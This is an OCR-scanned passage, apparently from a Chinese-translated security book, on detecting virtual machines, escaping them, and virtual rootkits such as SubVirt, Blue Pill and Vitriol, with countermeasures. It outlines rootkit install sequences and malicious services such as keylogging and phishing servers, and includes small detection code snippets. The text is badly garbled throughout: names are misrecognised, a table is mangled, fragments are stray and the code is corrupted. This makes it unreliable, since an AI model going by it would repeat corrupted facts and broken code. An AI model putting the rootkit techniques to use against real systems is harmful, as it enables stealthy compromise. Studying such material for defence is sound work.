从 2006 年 以 来 ，Trapkit.de 网 站 的 Tobias Klein 发 行 了 一 系列 测试 各 种 检测 方法 的 工具 。 这 些 工具 一 一 Scoopy、Scoopy 
Doo 和 Jerry 在 2008 年 整合 为 一 个 单独 工具 Scoopy NG, 


Scoopy Doo 最 早 通过 搜索 已 知 的 VMWare 分 配 的 MAC 地 址 和 其 他 虚拟 硬件 来 寻找 VM Ware 虚 拟 环境 中 的 基本 资源 差异 。 
但 是 ， 这 被 证 明 不 如 汇编 级 的 技术 可 靠 ， 因 此 这 个 产品 终止 了 。 


Scoopy NG 工具 使 用 7 个 不 同 的 测试 (来 自 多 个 研究 人 员 ) 确定 代码 是 否 运行 于 VM 之 中 。 它 在 单 处 理 器 和 多 处 理 器 系统 上 
检测 VMWare VM, ， 使 用 如 下 的 技术 : 


- 测试 1 如 果 IDT 基 地 址 在 已 知 位 置 说 明 在 VM 之 中 。 

. 测试 2 如果 LDT 基 地 址 不 是 0x00 说 明 在 VM 之 中 。 

- 测试 3 ”如 果 GDT 基 地 址 在 已 知 位 置 说 明 在 VM 之 中 。 

测试 4 如 果 STR MEM 指 令 返 回 0x00、0x40 说 明 在 VM 之 中 。 

测试 5 ”如果 特殊 汇编 指令 0x0a (version) 返回 VMWare 魔 法 值 0x564D5868 (VMXh 的 ASCII 码 ) 说 明 在 VM 之 中 。 

. 测试 6 如 果 特 殊 汇编 指令 0x14 (memsize) 返回 VMWare 魔 法 值 0x564D5868 (VMXh 的 ASCII 码 ) 说 明 在 VM 之 中 。 
. 测试 7 ”如 果 异 常 测 试 甬 发 VMWate 的 一 个 缺陷 说 明 在 VM 之 中 。 


测试 1~ 测试 3 是 人 所 共 知 的 ， 前 面 已 经 做 了 介绍 。 测 试 4 根据 $21Sec 的 Alfredo Andres Omella 在 2006 年 的 研究 


(http://www.s21sec.com/descargas/vmware-eng.pdf) 。 这 个 测试 发 出 一 个 存储 任务 寄存 器 (STR) x86 指 令 ， 并 且 检 查 任 
务 段 选 择 器 的 返回 值 。Alfredo 注 意 到 返回 值 与 非 虚拟 化 环境 中 的 不 同 。 里 然 这 个 检查 无 法 移植 到 多 核 和 多 处 理 器 环境 ， 但 是 也 
是 成 长 中 的 揭示 实现 缺陷 的 汇编 指令 列表 中 的 新 成 员 。 


测试 5 和 测试 6 是 根据 Ken Kato (http://chitchat.at.infoseek.co.jp/vmware/backdoor.html) 对 VMWare 使 用 的 允许 客 
户 和 主 操作 系统 互相 通信 (也 就 是 复制 和 粘贴 ) 的 “MO 后 门 ”的 研究 。 记 住 ， 这 些 端口 不 是 真实 的 ， 而 是 虚拟 端口 。0x5658 就 
是 这 样 一 个 端口 。 在 下 面 的 代码 中 ， 使 用 各 种 参数 查询 这 个 端口 ， 并 将 结果 和 已 知 的 魔法 值 (就 是 标志 产品 存在 的 特殊 值 ) 比 
较 : 


mov eax, 'VMXh' // VMware magic value (0x564D5868) 
mov ecx, 14h // get memory size command (0x14) 
mov dx, 'VX'! // special VMware I/O port (0x5658) 
in eax, dx // special I/O cmd 


VM 对 x86 指 令 IN 设 置 陷阱 并 且 仿 真 这 个 指令 进行 操作 ， 首 先 读 取 IN 指令 的 参数 ， 将 其 放 入 EAX (魔法 值 VMXh) 和 
ECX (操作 数 0x14 表 示 获 取 内 存 大 小 ) 寄存 器 ， 然 后 返回 一 个 值 。 如 果 返 回 值 等 于 VMXh， 则 代码 在 VM 中 执行 。 


最 后 一 个 测试 (测试 7) 根据 eEye 的 Derek Soeder 的 研究 
(http://eeyeresearch.typepad.com/blog/2006/09/another vmware_.html) 。 这 个 测试 基于 高 级 的 体系 结构 概念 ， 简 单 地 
说 ， 它 依靠 VMWare 中 的 一 个 不 正确 地 处 理 CPU 保 护 错 误 的 缺陷 ， 对 这 个 处 理 的 仿真 不 正确 ， 并 且 在 错误 发 布 之 前 就 发 出 执行 
转移 ， 而 “真正 ”的 处 理 器 会 首先 发 布 这 个 错误 。 因 此 ， 测 试 7 导致 一 个 错误 的 发 生 ， 然 后 检查 CPU 寄存 器 值 寻找 这 个 缺陷 。 


NIZ 
@” 


Bugcheck 创 建 的 Vrdtsc: 时 间 差 异 





Vrdtsc 工 具 是 加 拿 大 研究 人 员 Bugcheck 于 2006 年 编写 的 ， 进 行 各 种 时 间 测 试 以 了 解 代 码 是 否 在 虚拟 环境 中 执行 。 这 个 工具 
以 硬件 辅助 的 虚拟 环境 如 Intel 的 VT-x 技 术 作为 工作 对 象 ， 使 用 两 个 不 同 的 Intel 指 令 一 一 CPUID 和 RDTSC ( 读 取 时 间 戳 计数 器 ) 
进行 两 种 测试 。 


第 1 个 测试 发 出 1000 万 个 CPUID 指 令 并 测试 该 请 求 伦 费 的 处 理 器 “ 咬 噶 ” (tick， 处 理 器 级 的 时 间 单 位 ) 数量 。 在 非 虚拟 化 
机 器 上 ， 该 请 求 应 该 花费 大 致 50 ~ 150 个 tick， 但 是 使 用 具备 VT-x 硬 件 支持 的 虚拟 机 要 花费 5000 ~ 8000 个 tick。 代 码 如 下 : 


printf( "Attempting to detect a #VMEXIT on a cpuid instruction...\n" ); 
ticks = get cpuid loop ticks (NUM_ITERS) ; 
printf( "Total iterations : Su \n" 

"Total ticks : Ox%010164x\n" 


"Ticks per iteration: %I64u\n", NUM_ITERS, ticks, ticks/NUM_ITERS ); 
if ( ticks/NUM_ITERS < 150 ) 


printf( "Doesnt look like a VM based on CPUID time to execute\n" ); 
else 


printf( "Looks like a VM and CPUID is causing a #VMEXIT\n" ); 


第 2 个 测试 发 出 RDTSC 指 令 1000 万 次 ， 然 后 根据 tick 计 数 以 及 使 用 time () 函数 检查 起 始 时 间 来 比较 实际 时 间 的 差异 。 如 果 
总 执行 时 间 大 于 10 秒 ， 或 者 RDTSC 指 令 伦 费 超过 15 个 tick ( 非 虚拟 化 机 器 上 所 花费 的 时 间 ) ， 则 该 工具 报告 自己 处 于 VM 之 中 。 


目前 ， 我 们 已 经 关注 了 检测 虚拟 机 存在 的 多 种 方法 。 现 在 很 明显 ， 在 虚拟 机 中 实现 真正 的 透明 已 经 被 证 明 是 不 可 能 的 。 我 们 
现在 将 注意 力 转 向 使 Rootkit 脱 离 虚拟 环境 的 方法 。 


5.2.5 ”脱离 虚拟 环境 


当 恶 意 软件 检测 到 自己 陷入 虚拟 环境 之 中 ， 它 可 能 希望 逃脱 到 主 操作 系统 而 不 是 简单 地 终止 其 进程 。 一 般 来 说 ， 脱 离 VYM 需 
要 使 用 一 个 利用 程序 导致 一 个 服务 或 者 整个 VM 骨 溃 ， 使 恶意 软件 逃脱 虚拟 的 牢笼 。VMWare 文 件 共享 服务 中 的 一 个 目录 人 遍历 漏 
洞 就 是 例子 之 一 ， 这 个 漏洞 造成 该 服务 提供 到 主 OS 文 件 系统 的 根 目录 访问 权 
(http://www.coresecurity.com/content/advisory-vmware) 。 目 录 人 遍历 攻击 是 渗透 测试 界 著 名 的 技术 ， 这 种 测试 利用 应 用 
程序 解释 用 户 输入 中 的 弱点 获得 文件 或 者 文件 夹 的 未 授权 访问 。 通 过 模糊 (fuzzing) 技术 进行 的 彻底 的 VM 稳定 性 测试 在 Tavis 
Ormandy 的 一 篇 文章 中 作 了 介绍 (http://taviso.decsystem.org/virtsec.pdf) 。 模 糊 技术 也 是 一 种 渗透 技术 ， 试 图 通过 向 应 用 
程序 提供 残缺 的 输入 来 取得 未 授权 的 系统 访问 。 


但 是 ，VMWare 最 常 受 到 侵害 的 特性 是 VMWare Tools (一 个 生产 率 套件 ， 人 允许 主 操作 系统 和 客户 操作 系统 进行 交互 ， 例 
如 共享 文件 ) 所 使 用 的 未 写 入 文档 的 ComChannel 接 口 。ComChannel 接 口 是 VYMWare 使 用 所 谓 后 门 以 及 未 写 入 文档 的 特性 的 
最 广为人知 的 例子 。 在 SANSfire2007 会 议 上 ，Ed Skoudis 和 Tom Liston 示 范 了 由 ComChannel 构 建 的 各 种 工具 : 


* VMChat 

* VMCat 

* VMDrag-n-Hack 
> VMDrag-n-Sploit 
<- VMFtp 


所 有 这 些 工 具 都 使 用 利用 技术 导致 从 客户 操作 系统 中 通过 ComChannel 链 接 对 主 操作 系统 进行 无 意 的 /未 经 授权 的 访问 。 第 
一 个 工具 VMChat 实 际 上 从 ComChanne| 接 口 对 主 操作 系统 进行 了 一 次 DLL 注入 。 一 旦 DLL 进入 主 操作 系统 的 内 存 空间 ， 就 会 打 
开 一 个 后 门 通道 ， 允 许 主 操作 系统 和 客户 操作 系统 之 间 的 双向 通信 。 


事实 上 ，Ken Kato (在 5.2.4 节 中 提 到 过 ) 已 经 在 其 “VM Back” 项目 中 对 ComChannel 问 题 做 了 数 年 的 研究 
(http://chitchat.at.infoseek.co.jp/vmware/) 。 


尽管 这 些 工具 描述 了 VM 隔离 和 保护 中 的 严重 问题 ， 但 是 并 没有 表现 虚拟 技术 中 最 关键 的 威胁 。 第 三 类 恶意 软件 一 一 系统 管 
理 程 序 替 换 虚 拟 恶 意 软 件 代 表 这 种 威胁 。 


5.2.6 劫持 系统 管理 程序 


高 级 虚拟 Rootkit 的 终极 目标 是 颠覆 系统 管理 程序 一 控制 虚拟 环境 的 大 脑 。 如 果 Rootkit 能 够 将 自身 插入 到 客户 操作 系统 之 
下 ， 它 就 能 控制 整个 系统 。 


HVM Rootkit 通 过 几 个 似乎 不 太 困难 的 步骤 能 达到 以 下 目的 : 

1) 在 客户 操作 系统 中 安装 一 个 内 核 驱动 程序 。 

2) 寻找 并 且 初 始 化 硬件 虚拟 化 支持 (AMD-V 或 者 Intel VT-x) 。 
3) 从 驱动 程序 中 将 恶意 的 系统 管理 程序 代码 装 入 内 存 。 


4) 创建 一 个 新 的 VM 来 放置 主 操作 系统 。 


5) 将 新 的 VM 与 Rootkit 的 系统 管理 程序 绑 定 。 
6) 局 动 新 的 VM ， 实 际 上 将 主 操作 系统 切换 到 无 法 脱离 的 客户 模式 。 


这 一 过 程 完全 在 运行 中 发 生 ， 不 需要 重新 启动 (但 是 SubVirt Rootkit 需 要 重新 启动 使 Rootkit 装 入 ， 之 后 的 过 程 就 不 再 需要 
重新 启动 ) 。 


但 是 ， 在 我 们 详细 讨论 这 些 步骤 之 前 ， 必 须 研究 第 4 章 中 简单 提 到 的 一 个 新 概念 一 一 Ring1。 


Ring1 





为 了 完成 这 些 目标 ， 虚 拟 的 Rootkit 必 须 利用 目前 两 个 主要 的 CPU 制造 商 一 一 Intel 和 AMD 提 供 的 硬件 虚拟 化 支持 所 建立 的 
一 个 新 概念 ， 这 个 新 概念 就 是 Ring1。 如 果 你 回忆 一 下 第 4 章 中 的 x86CPU 特 权 级 别 图 ， 就 会 记得 特权 级 别 的 范围 是 从 Ring0 (最 
高 特权 ，Os 运 行 于 这 个 模式 ) 到 Ring3 (用 户 应 用 程序 运行 于 这 个 模式 ) 。Ring0 曾 经 是 最 高 特权 的 级 别 ， 但 是 现在 Ring1 包 含 
硬件 级 系统 管理 程序 ， 特 权 级 甚至 高 于 操作 系统 。 

为 了 便于 CPU 制造 商 实现 Ring1 (从 而 为 虚拟 软件 添加 原生 硬件 支持 ) ， 它 们 添加 了 多 条 新 的 CPU 指 令 、 寄 存 器 和 处 理 器 控 


制 标志 。AMD 命 名 这 些 增 加 的 支持 为 AMD-V 安 全 虚拟 机 (Secure Virtual Machine, SVM) ，Intel 命 名 自己 的 技术 为 虚拟 技 
术 扩 展 (Virtualization Technology extensions, VT-x) 。 我 们 来 看 看 这 些 技术 之 间 的 相似 之 处 。 


AMD-V SVM/Pacifica 和 Intel VT-x/Vanderpool 


为 了 理解 HVM Rootkit 如 何 利用 这 些 基 于 硬件 的 虚拟 化 技术 ， 扎 实地 掌握 这 些 扩展 为 x86 指 令 集 增添 的 功能 是 很 重要 的 。 下 
表 总 结 了 这 些 扩展 所 增加 的 主要 命令 和 数据 结构 。Blue Pill 和 Vitriol 使 用 了 这 些 扩展 。 


AMD INTEL 目的 


照 处 理 器 核心 配置 的 结构 ， 描 述 
虚拟 机 控制 块 (VMCB) 虚拟 机 控制 结构 (VMCS) 数据 结构 he ? oi Fe iret See 
户 VM 的 状态 


VMRUN VMLAUNCH CPU 指令 运行 一 个 客户 VM 
VMSAVE/VMLOAD VMWRITE/VMREAD CPU 指令 存储 / EE VMCB 中 的 客户 状态 信息 
VMMCALL VMCALL CPU 指令 从 客户 VM 中 与 系统 管理 程序 通信 


这 不 是 x86 指 令 集 中 添加 的 新 内 容 的 完整 列表 ， 但 是 实际 上 新 内 容 相 当 少 。 这 种 硬件 支持 的 轻 量 级 特性 是 因为 性 能 的 原因 。 








[1] 和 矩阵 (The Matrix) : 著名 科幻 影片 《黑客 帝国 》 中 的 虚拟 世界 。 译 者 注 


5.3 ”虚拟 Rootkit 实 例 


SubVirt 是 VMBR 的 一 个 例子 ， 而 Blue Pill 和 Vitriol 是 HVB Rootkit 的 例子 。 今 天 的 大 部 分 虚拟 Rootkit 是 这 三 种 Rootkit 的 变 
种 。 
"SubVitt 由 密 执 安 州 立 大 学 的 Samuel T.King 和 Peter M.Chen 以 及 Microsoft 研 究 所 的 Yi-Min Wang, Chad Verbowski、Helen 
J Wang 和 Jacob R.Lorch 协 同 开发 ， 针 对 Intel x86 技 术 ， 在 Windows XP 上 使 用 Virtual PC， 在 Gentoo Linux 上 使 用 VMWare 进 行 了 测 
试 。 


- Invisible Things Lab 的 Joanna Rutkowska 开 发 的 Blue Pill 针 对 AMD-V SVM/Pacifica 技 术 ， 在 x64Vista 上 进行 了 测试 


- Vittiol 由 Matasano Secutity 的 Dino Dai Zovi 开 发 ， 针 对 Intel VI-x， 在 MacOS X 上 进行 了 测试 。 


SubVirt: 基于 虚拟 机 的 Rootkit (VMBR) 





SubVirt 将 自身 插入 到 主 操作 系统 之 下 ， 创 建 一 个 新 的 系统 管理 程序 。 它 依靠 x86 体 系 结构 而 不 是 像 SVM 这 样 的 特定 虚拟 技 
术 ， 通 过 修改 系统 启动 顺序 来 装 入 。 作 者 还 实现 了 恶意 服务 以 展示 Rootkit 在 安装 后 可 能 造成 的 破坏 。SubVirt 同 时 针对 
Windows XP 和 Linux， 但 我 们 将 只 介绍 Windows 方 面 的 VMBR。 


为 了 修改 启动 顺序 ，SubVirt 需 要 并 且 假 设 攻击 者 已 经 得 到 了 系统 上 的 根 特权 并 且 能 够 将 VMBR 复 制 到 目标 系统 的 持久 化 存 
储 上 。 尽 管 这 个 假设 可 以 接受 ， 但 是 这 种 要 求 确 实 将 Rootkit 暴 露 在 某 些 脱 机 攻击 之 下 ， 并 且 限 制 了 这 个 工具 在 某 些 情况 中 的 适 
用 性 。 这 个 VMBR 复 制 到 Windows XP 的 第 一 个 活动 分 区 。 


局 动 顺序 被 修改 为 首先 执行 VMBR， 蔡 代 Os 引 导 程序 ， 这 通过 获 盖 磁 盘 上 的 BIO 控制 权 转移 的 目标 扇 区 完成 。 为 了 避免 防 
病毒 软件 、HIDSVHIPS 和 个 人 防火 墙 解决 方案 可 能 向 用 户 警 告 这 一 活动 。SubVirt 使 用 一 个 内 核 驱动 程序 注册 
LastChanceshutdown 回 调 例 程 。 这 个 例 程 在 系统 关闭 时 由 操作 系统 调用 ， 这 时 大 部 分 线程 已 经 终止 ， 文 件 系统 已 经 印 载 。 作 
为 第 二 级 保护 ， 这 个 恶意 内 核 驱动 程序 是 一 个 文件 系统 驱动 程序 和 大 部 分 防 病毒 类 产品 之 下 的 低级 驱动 程序 ， 因 此 这 些 高 级 别 的 
驱动 程序 将 不 会 发 现 SubVirt。 作 为 第 三 层 保护 ， 这 个 低级 内 核 驱动 程序 挂钩 低级 磁盘 驱动 程序 的 write () 例 程 ， 只 允许 VMBR 
被 写 入 到 磁盘 上 的 启动 块 中 。 


系统 重启 之 后 ，BIOs 将 执行 权 转 移 到 VMBR，VMBR 装 入 一 个 定制 的 “攻击 ”操作 系统 ， 作 为 恶意 服务 和 一 个 系统 管理 程 
序 的 宿主 。 这 个 系统 管理 程序 控制 并 且 启 动 一 个 经 过 封装 的 主 操作 系统 (作者 称 之 为 “目标 OS”) ， 同 时 攻击 操作 系统 为 在 目 


标 OS 内 操作 的 恶意 软件 提供 恶意 服务 和 低级 保护 (不 为 目标 OS 所 知 ) 。 


这 个 VMBR 的 目标 是 支持 运行 于 目标 OS 中 的 恶意 软件 ， 现 在 这 个 恶意 软件 已 经 被 装 入 一 个 VM 中 。VMBR 通 过 3 类 恶意 服务 
来 做 到 这 一 点 ， 作 者 将 这 些 服 务 定义 如 下 : 


* 完全 不 与 目标 OS 通 信 的 服务 。 例 如 ， 垃 圾 邮件 中 继 、 僵 尸 网 络 以 及 仿冒 Web 服 务 器 。 





- 观察 目标 OS 数 据 或 者 事件 的 服务 。 例 如 ， 击 键 记 录 程 序 和 网 络 封包 嗅 探 程序 。 
“ 对 目标 OS 执行 进行 敌意 修改 的 服务 ， 例 如， 抛弃 封包 或 者 删除 可 疑 数 据 。 


这 个 VMBR 能 够 在 不 为 目标 OS 所 知 的 情况 下 提供 这 些 服务 ， 因 为 VYMBR 能 够 对 目标 OS 发 出 的 硬件 指令 设置 陷阱 并 且 修 改 这 
些 指令 的 功能 。 这 是 普通 的 VM 仿真 程序 的 工作 ， 但 是 在 这 时 用 于 恶意 软件 的 目的 。 


我 们 将 简单 地 介绍 SubVirt 代 码 库 中 实现 的 这 3 类 服务 的 一 些 实例 。 


仿冒 Web 服 务 器 服务 


SubVirt VMBR 中 的 仿冒 Web 服 务 器 是 开发 用 于 描绘 与 目标 操作 系统 没有 交互 的 恶意 代码 的 。 仿 冒 网 站 是 试图 引导 用 户 港 
露 个 人 身份 信息 (Pll) 的 真实 网 站 的 诱饵 。 这 种 信息 通常 包含 姓名 、 地 址 、 社 会 保险 号 码 、 信 用 卡 信息 或 者 用 户 名 及 密码 。 这 
个 仿冒 网 站 使 用 攻击 操作 系统 中 的 一 个 thttpd web 服 务 器。 虚拟 网 络 设置 被 修改 ， 除 了 绑 定 到 端口 8080 的 入 站 TCP 被 引导 到 仿 
冒 网 站 以 外 ， 其 他 所 有 流量 都 被 重 定向 到 目标 。VMBR 环 境 没 有 包含 在 目标 操作 可 见 的 系统 的 任何 状态 或 者 事件 信息 。 


击 键 记录 程序 服务 


和 仿冒 Web 服 务 器 一 起 ，SubVirt VMBR 包 含 一 个 可 选 的 击 键 记录 程序 。 击 键 记录 程序 是 一 个 用 于 收集 和 存储 所 有 击 键 的 应 
用 程序 。 在 这 个 例子 中 ， 它 从 虚拟 机 上 的 一 个 Rootkit 之 中 运行 ， 试 图 在 目标 9s 不 知情 的 情况 下 收集 所 有 击 键 数 据 。 这 通过 仿真 
VMBR 中 的 键盘 模块 复制 所 有 击 键 并 且 将 其 发 送 给 攻击 ODS 实现 。 攻 击 OS 接 收 到 这 些 击 键 之 后 ， 一 个 定制 的 击 键 程序 就 会 搜索 可 
能 的 密码 。 在 攻击 系统 上 分 析 了 击 键 之 后 ， 数 据 被 转发 给 目标 OS。 


敏感 信息 文件 扫描 器 服务 


SubVirt 的 作者 还 开发 了 一 个 扫描 目标 文件 系统 寻找 可 能 包 合 敏 感 信息 文件 (例如 用 户 密 码 或 者 私有 密 钥 ) 的 模块 。 


防御 对 策 服务 


这 个 由 作者 实现 的 服务 表现 了 大 部 分 第 三 类 服务 中 最 有 侵略 性 的 服务 一 一 主动 修改 目标 OS。 这 个 服务 实际 上 是 修改 了 
Windows XP 中 处 理 执行 文件 到 进程 地 址 空间 映射 的 输出 内 核 函 数 (也 就 是 Windows 装 入 程序 ) 。 如 果 修 改 后 的 函数 发 现 Red 
Pi 程序， 就 在 程序 的 SIDT 指 令 上 设置 一 个 断 点 。 这 样 ， 当 Red Pi 运行 并 且 调用 SIDT， 它 就 会 中 断 执行 进入 系统 管理 程序 (A 
为 系统 管理 程序 为 了 仿真 而 设置 这 个 指令 的 陷阱 ) ， 然 后 纂 改 结果 来 欺骗 Red Pill. 


通过 重新 局 动 和 关机 保持 控制 


我 们 已 经 看 到 了 SubVirt Rootkit 的 多 种 隐蔽 8 能力， 例如 通过 底层 的 磁盘 驱动 程序 栈 钧 子 修改 启动 顺序 ， 以 及 安装 服务 透明 
地 监控 或 者 欺骗 目标 OS。 这 个 VMBR 甚 至 添加 了 更 隐蔽 的 特性 ， 阻 止 系 统 真正 关闭。 如 果 系 统 关 闭 ，VMBR 将 容易 受到 脱 机 攻 
击 ， 例 如 BIOSs 将 控制 权 传递 给 可 启动 的 CD-ROM 或 者 USB 驱 动 器 ， 检 测 程序 就 可 能 发 现 并 清除 SubVirt。 


为 了 保护 自己 免 遭 系统 重启 的 威胁 ， 这 个 VMBR 是 复位 虚拟 硬件 而 不 是 物理 硬件 。 这 给 目标 OS 造成 了 一 个 假象 ， 认 为 系统 
已 经 重启 ， 实 际 上 ， 物 理 系 统 仍 在 运行 。 为 了 避免 系统 天 闭 (例如 用 户 按 下 电源 关闭 按钮 )，VMBR 具 备 使 用 高 级 配置 和 电源 接 
O (ACPI) 休眠 状态 的 能 力 ， 使 系统 似乎 真正 关闭 。 这 时 系统 处 于 节能 模式 ， 电 源 仍然 提供 给 RAM ， 但 是 大 部 分 运动 部 件 关 
闭 。 


@ SubVirt 对 策 


SubVirt 的 作者 提出 了 多 种 对 抗 其 Rootkit 的 方法 。 第 一 种 方法 是 使 用 硬件 (如 保存 了 经 过 验证 的 启动 设备 hash 值 的 可 信任 
平台 模块 (Trusted Platform Module, TPM) ) 验证 启动 顺序 。 在 启动 期 间 ，BIOS 计 算 启动 顺序 项 目的 hash 值 并 与 已 知 的 
hash 值 比较 以 确保 没有 恶意 软件 存在 。 第 二 种 方法 是 使 用 可 移动 媒体 启动 并 用 取证 工具 (如 Helix Live-CD) 以 及 Rootkit 检 测 程 
序 (如 Strider Ghostbuster) 扫描 系统 。 最 后 一 种 方法 是 采用 安全 启动 过 程 ， 如 预先 存在 的 系统 管理 程序 或 者 验证 各 种 系统 组 
件 。 


SubVirt 方 法 的 总 体 弱 点 包括 : 
- 必须 修改 硬盘 的 引导 扇 区 才能 安装 ， 这 会 引起 脱 机 检测 技术 的 怀疑 。 


o 针对 没有 完全 虚拟 化 的 x86 体 系 结构 〈 某 些 指令 如 SIDT 运 行 在 非特 权 模 式 ) ， 使 其 引起 前 面 讨论 过 的 所 有 检测 技术 的 怀 


. 使 用 一 个 试图 仿真 指令 并 提供 虚拟 硬件 的 “重量 级 的 系统 管理 程序 ” (VMWare 和 Vittual PC) ， 使 其 引起 前 面 讨 论 过 的 通 
过 硬件 痕迹 的 检测 技术 的 怀疑 。 


o Blue Pill: 系统 管理 程序 虚拟 机 (HVM) Rootkit 





Blue Pill 在 2006 年 的 Black Hat USA 上 发 表 ， 现 在 的 发 展 已 经 超过 了 原来 的 概念 验证 学 畴 ， 现 在 它 是 一 个 稳定 的 研究 项 目 ， 
由 多 位 开发 人 员 支 持 ， 并 且 已 经 移植 到 其 他 体系 结构 中 。 我 们 将 介绍 原始 的 Blue Pill， 它 基于 AMD64SVM 扩 展 。 


主 操作 系统 在 运行 中 使 用 AMD64 的 安全 虚拟 机 (SVM) 扩展 被 引入 虚拟 机 中 。 这 是 其 他 虚拟 Rootkit (如 SubVirt) 所 不 具 
备 的 特性 。SVM 是 添加 到 AMD64 指 令 集 体系 结构 中 的 一 个 指令 集 ， 为 系统 管理 程序 提供 硬件 支持 ， 在 Rootkit 将 主 OS 封 装 到 
VM 中 之 后 ， 监 控 客 户 OS 接 受 恶 意 服务 的 命令 。 


Blue Pill 首 先 监测 虚拟 环境 ， 然 后 在 主 操作 系统 之 下 注入 一 个 “ 瘦 系 统管 理 程序 。”， 将 其 封装 在 一 个 虚拟 机 中 。 作 者 将 “ 瘦 
系统 管理 程序 ”定义 为 一 个 透明 地 控制 目标 机 器 的 程序 。 这 就 立刻 拉 响 了 和 警报， 因为 我 们 在 前 面 已 经 讨论 过 ， 就 像 Garfinkel 等 
人 在 他 们 的 文章 中 论述 过 的 (http://www.cs.cmu.edu/~jfrankli/hotosO7/vmm_ detection_hotos07.pdf) ， 提 供 透 明 虚 拟 化 


Blue Pi 以 如 下 的 方式 装 入 : 
1) 装 入 一 个 内 核 模 式 驱 动 程序 。 
2) 设置 一 个 特殊 CPU 寄存 器 为 1 (EFER MSR) ， 启 用 SVM 支持 。 


3) 分 配 和 初始 化 一 个 称 为 虚拟 机 控制 块 (VMCB) 的 特殊 数据 结构 ， 这 个 结构 用 于 在 Blue Pi 系统 管理 程序 接管 之 后 “ 监 
” 主 操作 系统 。 
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4) 将 系统 管理 程序 复制 到 内 存 的 隐藏 部 分 。 


5) 将 主 处 理 器 信息 保存 在 一 个 称 为 YM_HSAVE_PA MSR 的 特殊 寄存 器 中 。 


6) 修改 VMCB 数 据 结构 以 包含 允许 客户 操作 系统 将 执行 回 传 给 主 操作 系统 的 逻辑 。 
7) 设置 VYMCB,， 使 之 看 上 去 像 打算 “监禁 ”的 目标 VM 的 保存 状态 。 

8) 跳 转 到 系统 管理 程序 代码 。 

9) 执行 YMRUN 指 令 ， 传 递 “ 监 禁 ”VM 的 地 址 。 


一 旦 发 出 VMRUN 指 令 ，CPU 就 运行 于 非特 权 客户 模式 。 仅 当 客户 VM 发 出 VMEXIT 指 令 时 CPU 执行 级 别 才 得 以 提升 。Blue 
Pill 系 统管 理 程序 捕捉 这 条 指令 。 


Blue Pil 的 多 种 功能 有 助 于 其 隐蔽 性 : 
着 系统 管理 程序 ”不 试图 仿真 硬件 或 者 指令 集 ， 所 以 前 面 讨论 的 大 部 分 检测 方法 都 无 效 。 
+ 对 性 能 的 影响 很 小 。 
` Blue Pill 在 运行 中 安装 并 且 不 需要 重启 。 
- 使 用 “Blue Chicken” 在 检测 到 定时 指令 时 短暂 地 印 载 Blue Pill 系 统管 理 程序 ， 以 此 来 阻止 时 间 检 测 。 
Blue Pill 包 含 如 下 局 限 : 
. 不 能 持续 ， 即 重启 会 删除 它 。 


: 研究 人 员 已 经 指出 快速 重 编 址 缓冲 器 (TLB) 、 条 件 预 测 、 基 于 计数 器 的 时 钟 以 及 GP 异常 能 够 发 现 Blue Pill 的 副作用 。 这 
些 都 是 Blue Pi 无 法 直接 控制 的 处 理 器 专用 结构 /功能 ， 但 是 它们 直接 受到 Blue Pill 使 用 系统 资源 的 影响 ， 就 像 其 他 软件 所 产生 的 
影响 一 样 。 


o Vitriol: 硬件 虚拟 机 (HVM) Rootkit 





Vitriol Rootkit 与 Joanna 的 Blue Pill 在 Black Hat USA2006 上 同时 发 布 。 这 个 Rootkit 和 Blue Pill 是 一 阴 一 阳 ， 因 为 Vitriol 
Rootkit 针 对 的 是 Intel VT-x 硬 件 虚拟 化 支持 ， 而 Blue Pill 针 对 的 是 AMD-V SVM 支持 。 


前 面 已 经 提 到 过 ，lntel VT-x 支 持 提供 硬件 级 别 的 CPU 指 令 ， 这 些 指令 由 VT-x 系 统管 理 程序 用 于 提升 或 降低 CPU 的 执行 级 
别 。VT-x 术 语 中 有 两 种 执行 级 别 : VMX root (Ring0) 和 VMX non-root (“ 较 低 特权 级 ”的 Ring0) 。 客 户 操作 系统 启动 和 


运行 于 VMX non-root 模 式 ， 但 是 当 它 们 需要 访问 特权 指令 (例如 执行 MO 操作 ) 时 可 以 发 出 一 个 VM exit 指 令 。 这 时 ，CPU 提 
升 到 VMX root。 





这 种 技术 与 AMD-V SVM 支 持 没有 本 质 的 不 同 : 两 种 技术 都 完成 相同 的 目标 
程序 。Blue Pill 和 Vitriol Rooktit 也 以 相似 的 方式 利用 它们 : 


具有 完全 虚拟 化 支持 的 硬件 级 别 系统 管理 


“ 在 目标 OS 中 安装 一 个 内 核 驱动 程序 。 

- 访问 低级 虚拟 化 支持 指令 (例如 VT-x 中 的 VMXON) o 

* 创建 用 于 恶意 的 系统 管理 程序 的 内 存 空间 。 

- 为 新 的 虚拟 机 创建 内 存 空间 。 

- 将 运行 中 的 OS 移植 到 新 的 VM 中 。 

为 所 有 来 自 新 VM 的 命令 设置 陷阱 ， 保 护 恶 意 的 系统 管理 程序 。 


Virtiol 在 3 个 主要 函数 中 实现 所 有 步骤 ， 在 不 为 人 知 的 情况 下 将 主 OS 放 入 一 个 VM 中 : 


. Vmx init () 检测 并 且 初 始 化 VT-x。 
-Vmx_fork () 将 运行 中 的 主 OS 装 入 一 个 VM 中 ， 并 且 在 操作 系统 之 下 放置 一 个 系统 管理 程序 。 
. On_vm_exit () 处 理 VMEXIT 请 求 并 且 进 行 仿真 。 


最 后 一 个 函数 还 提供 典型 的 Rootkit 功 能 : 访问 过 滤器 设备 、 隐 藏 进程 和 文件 、 读 取 / 修 改 网 络 流量 及 记录 击 键 。 所 有 这 些 功 
能 在 操作 系统 之 下 的 Rootkit 系 统管 理 程序 中 实现 。 


© 虚拟 Rootkit 对 策 


随 着 企业 基础 架构 和 数据 中 心 持续 地 从 裸 机 转向 虚拟 服务 器 ， 虚 拟 Rootkit、 恶 意 软件 和 威胁 将 不 断 增长 。 自 从 围绕 2006 年 
Blue Pill (以 及 宣传 较 少 的 Vitriol) 的 发 行 引起 的 热潮 之 后 ，AMD 和 Inte| 已 经 对 其 虚拟 化 技术 进行 改进 以 对 抗 这 一 威胁 ， 甚 至 
直到 一 年 之 后 都 没有 发 布 源 代 码 。 根 据 Crucial Security 的 白皮书 

(http://www.crucialsecurity.com/documents/hvmRootkits.pdf) ，AMD 的 AMD64 处 理 器 revision2 包 含 了 在 启用 和 禁 
SVM 虚 拟 化 技术 时 要 求 一 个 加 密 密 钥 的 功能 。 回 忆 一 下 ，Blue Pill 装 入 的 先决 条 件 是 : 能 够 通过 设置 EFER MSR 寄 存 器 的 SVME 
